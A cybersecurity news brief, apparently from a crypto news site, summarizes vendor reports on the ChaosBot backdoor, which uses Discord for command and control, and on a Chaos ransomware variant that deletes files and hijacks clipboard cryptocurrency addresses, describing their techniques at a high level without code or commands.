- A new Rust-based backdoor named ChaosBot allows remote command execution and reconnaissance on infected Windows systems.
- ChaosBot uses Discord accounts for command-and-control communication with compromised devices.
- The Malware spreads via compromised credentials and phishing messages containing malicious Windows shortcut (LNK) files.
- ChaosBot employs evasion techniques such as bypassing Windows Event Tracing and detecting virtual machines to avoid analysis.
- Chaos Ransomware has evolved with destructive file deletion and clipboard hijacking features to increase financial theft.
Cybersecurity experts identified a new backdoor malware called ChaosBot written in Rust, targeting Windows systems to gather information and run arbitrary commands. This malware was discovered by eSentire in late September 2025 within a financial services company’s network.
Threat actors gained access using stolen credentials linked to Cisco VPN and an over-privileged Active Directory account named “serviceaccount.” They used Windows Management Instrumentation (WMI) to remotely execute commands and deploy ChaosBot across the network. Notably, the malware uses Discord profiles operated by users “chaos_00019” and “lovebb0024” to issue commands to infected computers.
The malware may also spread through phishing emails that include malicious Windows shortcut files. When opened, these files execute PowerShell commands to download and launch ChaosBot while displaying a fake PDF to distract victims. The malware loads a malicious DLL by sideloading it with a Microsoft Edge executable, after which it performs system checks and installs a reverse proxy using the open-source FRP tool to maintain network access.
The operators attempted but failed to configure additional backdoors using Visual Studio Code Tunnel services. The main function remains interacting with the Discord channel associated with the victim’s computer for further instructions. ChaosBot supports commands for running shell commands, taking screenshots, and transferring files between victims and the Discord channel.
Researchers at eSentire reported that newer versions of ChaosBot use methods to avoid detection by Windows Event Tracing for Windows (ETW) and by identifying virtual machines through MAC address checks. If a virtual machine is detected, the malware exits to prevent analysis.
Separately, Fortinet FortiGuard Labs described an updated variant of Chaos ransomware written in C++ that includes new capabilities. This version can irreversibly delete large files instead of encrypting them, and it can hijack clipboard content by replacing legitimate Bitcoin addresses with those controlled by attackers. This tactic aims to increase financial losses through both data destruction and cryptocurrency theft.
The ransomware disguises itself as fake utilities like System Optimizer v2.1 to trick users into installing it. It checks for a file indicating previous infection before starting encryption. If run with admin rights, it disables system recovery features and encrypts files smaller than 50 MB, skipping those between 50 MB and 1.3 GB for efficiency. It uses various encryption methods, including symmetric, asymmetric, and a backup XOR routine to make removal more difficult.
For further information on ChaosBot, see the eSentire report. Details on the ransomware evolution are available in the Fortinet FortiGuard Labs report.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
Previous Articles:
- Gold Hits $4,078 High as Wall Street, BRICS Fuel $10,000 Rally
- Asian Shares Slip in Holiday Trade; US Futures Rebound as Tensions Ease
- US Shutdown Delays Approval of 16 Crypto ETFs, Industry Awaits
- Astaroth Banking Trojan Uses GitHub to Evade Takedowns
- XRP Rallies 8.7% as Crypto Market Rebounds After Major Crash
